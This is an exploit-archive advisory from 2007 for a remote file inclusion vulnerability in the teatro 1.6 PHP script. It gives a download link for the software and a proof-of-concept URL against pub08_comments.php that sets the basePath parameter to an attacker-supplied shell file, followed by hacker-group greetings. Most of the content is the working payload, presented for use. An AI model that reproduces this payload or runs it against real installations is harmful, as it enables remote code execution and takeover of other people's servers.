id: 2254
date: 10/27/2007
title: teatro 1.6 (basePath) Remote File Include Vulnerability
author: Alkomandoz Hacker
cves: 

=======================================================
teatro 1.6 (basePath) Remote File Include Vulnerability
=======================================================



# teatro 1.6 Remote File Include Vulnerability
 Download script : http://telemat.die.unifi.it/book/2003/Telematica-II/teatro-1.6.tgz
 Dicovered by    : Alkomandoz Hacker
=========================================================================

 
http://localhost/path/teatro/pub/pub08_comments.php?basePath=shell.txt
======================================================================

# Thanx:   AsbMay's Group & City Of Ghosts Team & Sniper-sa Team
# Greetz To:   Sniper_Sa & Pal-Hackers & Hack eGy & Dr SeSo & No4Hard & Devil-x & Gold_M



#  0day.today [2023-03-26]  #